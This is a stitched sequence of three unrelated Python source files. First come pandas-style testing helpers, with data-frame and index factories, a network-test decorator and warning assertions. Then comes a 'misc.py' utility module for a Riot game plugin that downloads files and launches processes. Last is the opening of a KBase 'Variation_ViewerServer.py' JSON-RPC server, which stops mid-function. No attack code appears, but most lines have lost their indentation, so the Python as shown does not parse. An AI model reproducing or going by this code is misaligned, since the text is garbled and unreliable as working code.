def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
    * id : int dtype with Poisson-distributed values
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k=10):
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
    Create an index/multiindex with given dimensions, levels, names, etc.
    nentries - number of entries in index
    nlevels - number of levels (> 1 produces multiindex)
    prefix - a string prefix for labels
    names - (Optional), bool or list of strings. if True will use default
        names, if false will use no names, if a list is given, the name of
        each level in the index will be taken from the list.
    ndupe_l - (Optional), list of ints, the number of rows for which the
        label will be repeated at the corresponding level, you can specify just
        the first few, the rest will use the default ndupe_l of 1.
        len(ndupe_l) <= nlevels.
    idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
        If idx_type is not None, `idx_nlevels` must be 1.
        "i"/"f" creates an integer/float index,
        "s"/"u" creates a string/unicode index
        "dt" creates a datetime index.
        "td" creates a timedelta index.
        if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
    assert names is None or names is False or names is True or len(names) == nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
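# Illustrative usage sketch (not part of the original helpers): makeCustomIndex
# builds a flat Index for nlevels=1 and a MultiIndex otherwise, generating
# labels of the form "<prefix>_l<level>_g<group>" unless idx_type is given.
# >>> makeCustomIndex(nentries=4, nlevels=1, prefix="C")
# Index(['C_l0_g0', 'C_l0_g1', 'C_l0_g2', 'C_l0_g3'], dtype='object')
# >>> makeCustomIndex(nentries=4, nlevels=2, names=True)  # MultiIndex, levels named '#0', '#1'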
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
    c_idx_names, r_idx_names - False/True/list of strings, yields no names,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
    r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
        If idx_type is not None, `idx_nlevels` must be 1.
        "i"/"f" creates an integer/float index,
        "s"/"u" creates a string/unicode index
        "dt" creates a datetime index.
        "td" creates a timedelta index.
        if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
    # 4-level multiindex on rows with names provided, 2-level multiindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def optional_args(decorator):
"""
allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
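# Illustrative sketch of optional_args in use (the decorator name `tag` and its
# `label` keyword are made up for the example): the wrapped decorator can be
# applied bare or with keyword arguments.
# >>> @optional_args
# ... def tag(func, label="default"):
# ...     func.label = label
# ...     return func
# >>> @tag                      # bare: decorates the function directly
# ... def f(): pass
# >>> @tag(label="custom")      # parametrized: returns a decorator first
# ... def g(): pass
# >>> f.label, g.label
# ('default', 'custom')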
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""
Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
    url : str
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="https://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'https://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
        Any exception that has .errno or .reason.errno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
    Tests decorated with @network will fail (rather than be skipped) when an
    error is raised and the check URL (defaults to google.com) is still
    reachable, i.e. when the failure is unlikely to be a connectivity problem::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
    URLError: <urlopen error unknown url type: rabbit>
You can specify alternative URLs::
>>> @network("https://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if (
check_before_test
and not raise_on_error
and not can_connect(url, error_classes)
):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
            if not errno and hasattr(err, "reason"):
errno = getattr(err.reason, "errno", None)
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning: Optional[Union[Type[Warning], bool]] = Warning,
filter_level="always",
check_stacklevel: bool = True,
raise_on_extra_warnings: bool = True,
match: Optional[str] = None,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
        The type of warning to check for. ``Warning`` is the base
        class for all warnings. To check that no warning is returned,
        specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
        the warning to show where the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
match : str, optional
Match warning message.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
    .. warning:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
matched_message = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if not expected_warning:
continue
expected_warning = cast(Type[Warning], expected_warning)
if issubclass(actual_warning.category, expected_warning):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
_assert_raised_with_correct_stacklevel(actual_warning)
if match is not None and re.search(match, str(actual_warning.message)):
matched_message = True
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
expected_warning = cast(Type[Warning], expected_warning)
if not saw_warning:
raise AssertionError(
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
if match and not matched_message:
raise AssertionError(
f"Did not see warning {repr(expected_warning.__name__)} "
f"matching {match}"
)
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
def _assert_raised_with_correct_stacklevel(
actual_warning: warnings.WarningMessage,
) -> None:
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[3][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
class RNGContext:
"""
    Context manager to set the numpy random number generator seed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
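# Illustrative usage sketch: temporarily register a dialect so read_csv can be
# exercised with the `dialect` keyword (StringIO from io is assumed). Note that
# the dialect is only unregistered if the block exits without raising.
# >>> with with_csv_dialect("pipes", delimiter="|"):
# ...     df = pd.read_csv(StringIO("a|b\n1|2"), dialect="pipes")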
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr.USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
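# Illustrative usage sketch: temporarily force the plain numpy evaluation path
# (or lower the numexpr element threshold) for the duration of a test; the
# `df_large` frame here is hypothetical.
# >>> with use_numexpr(False):
# ...     result = df_large + df_large   # evaluated without numexpr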
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
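# Illustrative usage sketch: because return values are discarded, parallel tests
# typically assert on side effects, e.g. a shared list appended from each thread.
# >>> results = []
# >>> @test_parallel(num_threads=4)
# ... def append_one():
# ...     results.append(1)
# >>> append_one()
# >>> len(results)
# 4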
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
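# Illustrative sketch: with no skipna_alternative, the wrapper mimics a
# reduction's skipna=True behaviour by dropping NaNs before calling `alternative`.
# >>> wrapper = _make_skipna_wrapper(np.sum)
# >>> wrapper(Series([1.0, np.nan, 2.0]))
# 3.0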
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
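# Illustrative sketch: rows are joined with os.linesep and a trailing separator
# is appended, matching DataFrame.to_csv output on the current platform.
# >>> convert_rows_list_to_csv_str(["a,b", "1,2"])   # on a POSIX system
# 'a,b\n1,2\n'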
def external_error_raised(expected_exception: Type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from SelectionMixin._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
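# Illustrative sketch (the expected value 3 is made up for the example): each
# ("name", expected) pair is expanded into one entry keyed by the string name
# plus one entry per matching callable from _cython_table, which is convenient
# for pytest.mark.parametrize.
# >>> params = get_cython_table_params(Series([1, 2]), [("sum", 3)])
# >>> # each element is a (ndframe, func_or_name, expected) triple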
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : string
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
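# Illustrative sketch: plain names resolve directly via the operator module,
# while reverse ("r"-prefixed) names get their operands swapped.
# >>> get_op_from_name("add")(2, 3)
# 5
# >>> get_op_from_name("__rsub__")(2, 3)
# 1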
|
misc.py
|
import os, asyncio, logging, subprocess, tempfile, multiprocessing
from types import FunctionType
import requests
from consts import LOCAL_FILE_CACHE
log = logging.getLogger(__name__)
async def get_size_at_path(start_path, *, if_none=None):
if start_path is None:
return if_none
total_size = 0
for dirpath, dirnames, filenames in os.walk(start_path):
for f in filenames:
await asyncio.sleep(0)
fp = os.path.join(dirpath, f)
if not os.path.islink(fp):
total_size += os.path.getsize(fp)
log.debug(f"Size: {total_size} bytes - {start_path}")
return total_size # in bytes
def get_product_settings_path(game_id):
# Given the game ID, returns the path of the product settings yaml file.
return os.path.expandvars(
"%PROGRAMDATA%\\Riot Games\\Metadata\\{0}.live\\{0}.live.product_settings.yaml".format(
game_id
)
)
def run(cmd, *, shell=False):
log.info(f"Running: {cmd}")
return subprocess.Popen(cmd, shell=shell)
def open_path(path, args=None):
    args = args or []  # avoid a shared mutable default argument
    cmd = f'"{path}" {" ".join(args)}'.strip()
log.info(f"Opening: {path}\nWith args: {args}")
return run(cmd)
PROCESSES = []
def _download(u, c):
r = requests.get(u)
download_path = os.path.join(tempfile.gettempdir(), u.split("/")[-1])
with open(download_path, "wb") as f:
f.write(r.content)
c(download_path)
def download(url, callback: FunctionType):
log.info(f"Downloading: {url}")
proc = multiprocessing.Process(target=_download, args=(url, callback))
proc.start()
PROCESSES.append(proc)
return proc
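# Illustrative usage sketch (the URL is hypothetical): the callback runs inside
# the spawned process and receives the temp-file path of the downloaded payload.
# >>> def on_done(path):
# ...     log.info(f"saved to {path}")
# >>> download("https://example.com/installer.exe", on_done)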
def kill_all_processes():
for proc in PROCESSES:
proc.terminate()
def cleanup():  # Clean up files created by/for an earlier version of the plugin that are no longer needed
old_riot_client_location_file = os.path.expandvars(
"%LOCALAPPDATA%\\GOG.com\\Galaxy\\plugins\\installed\\riot_client_location.txt"
)
old_installer_path = os.path.abspath(
os.path.join(os.path.abspath(__file__), "..", "..", "riot_installer.exe")
)
old_delete_paths = [old_riot_client_location_file, old_installer_path]
old_local_file_cache = os.path.abspath(
os.path.join(os.path.abspath(__file__), "..", "..", "play_time_cache.txt")
) # don't delete just rename
for path in old_delete_paths:
if os.path.isfile(path):
os.remove(path)
if os.path.isfile(old_local_file_cache):
os.rename(old_local_file_cache, LOCAL_FILE_CACHE)
|
Variation_ViewerServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from Variation_Viewer.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'Variation_Viewer'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from Variation_Viewer.Variation_ViewerImpl import Variation_Viewer # noqa @IgnorePep8
impl_Variation_Viewer = Variation_Viewer(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
